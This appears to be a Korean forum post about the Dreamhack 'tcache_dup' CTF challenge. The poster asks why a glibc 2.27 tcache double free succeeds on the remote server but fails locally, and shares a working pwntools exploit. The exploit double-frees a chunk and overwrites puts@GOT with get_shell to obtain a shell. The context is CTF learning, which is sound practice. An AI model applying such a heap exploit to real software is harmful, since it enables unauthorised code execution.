tcache_dup

로컬 환경과 원격 모두 glibc 2.27 버전인데 로컬에선 막히고 원격에선 되네요.. glibc 버전이 같아도 환경에 따라 dfb가 막히기도 하나요? 원격 환경이 dfb 검증을 하는지 확인하는 간편한 방법이 따로 있을까요? 직접 시도해보고 EOFError 뜨는지 확인하는 방법이 최선일까요?

from pwn import * p = remote('host3.dreamhack.games', 19102) #p = process('./tcache_dup') e = ELF('./tcache_dup') libc = ELF('libc-2.27.so') def create(a, b): p.sendlineafter('> ', str(1)) p.sendlineafter(': ', str(a)) p.sendafter(': ', b) def delete(a): p.sendlineafter('> ', str(2)) p.sendlineafter(': ', str(a)) create(0x10, 'aaaa') delete(0) delete(0) create(0x10, p64(e.got['puts'])) create(0x10, 'a'*8) create(0x10, p64(e.sym['get_shell'])) p.interactive() 이렇게 해서 풀었는데 더블프리 하고 다시 create(0x10, p64(e.got['puts'])) create(0x10, 'a'*8) create(0x10, p64(e.sym['get_shell'])) 저렇게 할당 받았을때 왜 puts@got가 쉘 함수로 덮이는지 궁금 합니다 중간에 왜 a*8이 들어가는지도 궁금하고 도와주세요..

문제 서버 연결해서 하면 익스가 되는데 로컬에서 libc 적용하고 익스 시도하면 안되는데 로컬에서 익스플로잇 하는 방법이 있나요?